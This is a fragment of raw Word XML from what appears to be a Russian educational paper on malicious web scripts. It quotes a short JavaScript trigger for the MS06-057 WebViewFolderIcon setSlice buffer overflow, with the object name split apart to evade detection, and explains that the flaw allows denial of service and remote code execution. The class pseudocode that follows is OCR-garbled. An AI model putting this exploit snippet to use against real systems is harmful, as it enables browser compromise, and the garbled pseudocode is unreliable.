          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>php</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В заключение можно сказать, что, несмотря на огромное разнообразие вредоносных скриптов и методов их скрытия, противостоять растущему уровню хакерских атак, использующих уязвимости в установленном программном обеспечении, вполне возможно. В этом могут помочь антивирусные средства с функцией проверки загружаемых из Интернет данных, а также отключение выполнения опасного содержимого в Интернет браузере.</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r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="43"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пример описания уязвимости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Исходный код, использующий уязвимость </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">WebViewFolderIcon, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">написанный на </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Java Script:</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20"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>for (i=0;i&lt;128;i++)</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20"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{</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20"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>try</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20"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{</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20"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>var tar = new ActiveXObject('WebVi'+ 'ewFol'+ 'derIc'+ 'on. WebVi'+ 'ewFol'+ 'derI'+ 'con.1'); d = 0x7ffffffe; b = 0x0c0c0c0c tar.setSlice(d, b, b, b );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1210"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1220"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1210"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1220"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>catch(e){}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1210"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1220"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1e"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Скрипт создает </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">128 </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">объектов </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ActiveX </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">объекта </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">WebViewFolderIcon </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и вызывает для него метод </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">setSlice(), </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">вызывающий </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="aff3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>переполнение буфера в случае передачи значения первого параметра = 0x7ffffffe. Данная уязвимость (MS06-057), используется для организации DoS атак, а также для удаленного исполнения вредоносного кода злоумышленника.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5631180" cy="3009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31180" cy="3009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Данная уязвимость находится в библиотеках </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">WebView (webvw.dll) </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Controls Library (comctl32.dll), </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>которые загружается Интернет браузером.</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Псевдокод класса </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">WebViewFolderlcon </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>представлен ниже:</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2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ambler."</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Font </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="19BookmanOldStyle"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w: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2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="191"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="192"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">virtual void </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ClearClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(AmbientFont </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1913"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>*)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="191"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="192"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">virtual void </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ClearClassAndOb</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ject </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(ArribientFont </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="19BookmanOldStyle2"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="19BookmanOldStyle2"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="19BookmanOldStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HGDICBJt ;</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40"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) ;</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6E1E7E">
        <w:rPr>
          <w:rStyle w:val="192"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="192"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">lass </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">CWebFolderViewIcon </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="19BookmanOldStyle"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w: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2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="191"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CWebFc</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lderviewlcon</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1913"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1912"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="191"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-CWebFolderViewIcon(; </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w: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2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SetSlice </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1911"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">int, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">tagVARIANT, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a g VAR I AN T</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">tagVARIANT) ; </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="192"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w: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2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
